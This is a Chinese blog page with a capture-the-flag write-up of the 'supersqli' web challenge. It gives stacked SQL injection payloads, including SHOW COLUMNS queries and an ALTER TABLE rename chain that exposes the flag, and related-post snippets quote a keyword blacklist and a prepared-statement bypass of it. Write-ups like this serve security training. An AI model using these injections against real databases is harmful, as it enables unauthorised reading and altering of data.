攻防世界-supersqli

于 2021-11-01 16:22:32 发布
阅读量101 收藏
点赞数
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47571887/article/details/121082054
版权

 根据题目提示,输入1‘没有回显,输入1’#正常回显

查字段,只有2个

select发现被过滤,尝试堆叠注入。

 发现有两个表,分别查看  (查看字符串要加反引号)

1';show columns from `1919810931114514` --+

1';show columns from `words` --+

发现flag存放在1919810931114514里面

 由于上面的探测得出搜索框里查询的是words表里的结果,so我们将表1919810931114514改为words,flag列改为id,就可以查询出来flag。

语法为alter table words rename to words1;(将words表改为words1)

           alter table users change flag id varchar(30);(将flag字段改为id字段)

完整payload:alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

然后使用1‘ or 1=1;#即可查询出flag

 本人菜鸟一枚,欢迎各位大佬私信指教

八哥不爱做题
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界 supersqli
qq_51744055的博客
06-11 120
输入1’ 不回显,输入1’# 显示正常。应该存在sql注入 根据 1’ and 1=1判断 1’ order by 2# 发现有两列 order by 3时候报错 输入 联合查询 1’ union select 1,database()# return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 返回黑名单 堆叠注入: --+要在url中输入,hackerbar,输入框中对
supersqli_攻防世界
u014794949
10-23 405
进入题目发现是文本框提交,通过尝试确定闭合字符和注入点 order by确定存在2个字段 1' order by 2# union select查询发现关键字过滤 通过堆叠注入得到库名 1';show databases;# 尝试得到表名 1';show tables;# 尝试得到两表中的列名 1';show columns from `1919810931114514`;# 1';show columns from `words`;# flag列中比较可能存放答案,words表里
攻防世界supersqli
qq_51283187的博客
08-01 103
攻防世界supersqli 这个题用到了预编译的技巧,可以绕过对select等命令的限制 类似于分块传输了,很实在! -1’; //这个位置 set @sql = CONCAT(‘se’,‘lect * from 1919810931114514;’); prepare stmt from @sql; EXECUTE stmt; # //记得这里要用;去结束前面的语句,也就是1’ #可以执 行成功了,那么我们还需要在1’后面加一个; //来闭合前面的语句 ...
攻防世界-supersqli详解
Mr_helloword的博客
08-11 6335
supersqli 查看是否存在SQL注入 1' and 1=1 # 用二分法查看列数(有两列) 1' order by 2 # 使用联合查询发现做了SQL注入黑名单禁止出现以下关键字
攻防世界 supersqli writeup
12-14
发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询...
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界nice-bgm杂项
11-20
在网络安全领域,"攻防世界"是一个广受欢迎的在线平台,提供各种安全挑战,帮助学习者提升他们的黑客防御和攻击技能。"nice-bgm杂项"是其中的一个挑战,属于"misc"类别,这意味着它可能涉及到多种不同类型的解题技巧...
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
关于电压互感器的详细介绍.pdf
07-20
电压互感器(Voltage Transformer,简称VT),又称电压变压器或电压互感器(PT),是电力系统中不可或缺的重要设备之一。以下是关于电压互感器的详细介绍: 一、定义与功能 电压互感器是一种用于测量高电压并将其转换成低电压信号的电器设备,以便于测量、监测和保护。它主要用于电力系统中测量仪表、继电保护等二次设备获取电气一次回路电压信息的传感器。通过将高电压按比例转换成低电压(如100V或更低),电压互感器使得电力系统中的电压测量、保护和控制变得更加容易和安全。 二、工作原理 电压互感器的工作原理基于电磁感应原理。它通常由高压绕组、低压绕组和磁芯组成。高压绕组与高压电网中的相线相连,低压绕组则与电压表、保护装置等低压设备相连。当高压绕组中有电流通过时,会在绕组中产生磁场,这个磁场会穿过磁芯并感应到低压绕组中,从而在低压绕组中产生电压。由于低压绕组的匝数较多,因此在低压绕组中感应到的电压远低于高压绕组中的电压。 三、类型与分类 根据功能和用途,电压互感器可以分为多种类型。常见的类型包括电磁式电压互感器(如电容式电压互感器,应用广泛)和非电磁式电压互感器(如电子式、光电式等)
职工信息管理系统【C语言课程设计源码+项目文档】
07-20
职工信息管理系统【C语言课程设计源码+项目文档】 在日益发展的现代社会,一个高效实用的职工信息管理系统已经是企业必不可少的一个管理工具,它可以使企业在管理方面减少很多时间,本课程设计针对现代社会企业对员工信息的管理而设计, 使员工的管理更加的简捷,更加的方便,界面友好,易于操作。 1.1录入职工信息 对每个使用者进行进行录入,实现“一人一档”,录入使用者的工号、姓名、性别、电话号码、地址。 1.2输出职工信息 对已录入的使用者信息进行输出。将所有已经输入的职工信息一一输出。 1.3查询职工信息 对已录入的使用者信息进行查看,可通过编号和姓名进行搜索。 1.4更新职工信息 对已录入的使用者信息进行修改。首先需输入修改者编号,其次可进行修改。 欢迎学习!
09-输入.py
07-20
09-输入
使用PythonShapefileLibrary创建和编辑Shapefile文件.doc
最新发布
07-20
Python
物联网工程_车祸自动报警系统设计.docx
07-20
物联网工程_车祸自动报警系统设计
1203GMT-VB一种N-Channel沟道DFN8(5X6)封装MOS管
07-20
1203GMT-VB;Package:DFN8(5X6);Configuration:Single-N-Channel;VDS:30V;VGS:20(±V);Vth:1.7V;RDS(ON)=9mΩ@VGS=4.5V;RDS(ON)=7mΩ@VGS=10V;ID:80A;Technology:Trench;
某大型集团SAP数字化转型方案.pptx
07-20
某大型集团SAP数字化转型方案.pptx
【独家首发】Matlab实现被囊群优化算法TSA优化Transformer-LSTM实现负荷数据回归预测.rar
07-20
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
机房安全检查表-整理最新
07-20
机房安全检查表-整理最新
攻防世界-baby_web详解
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值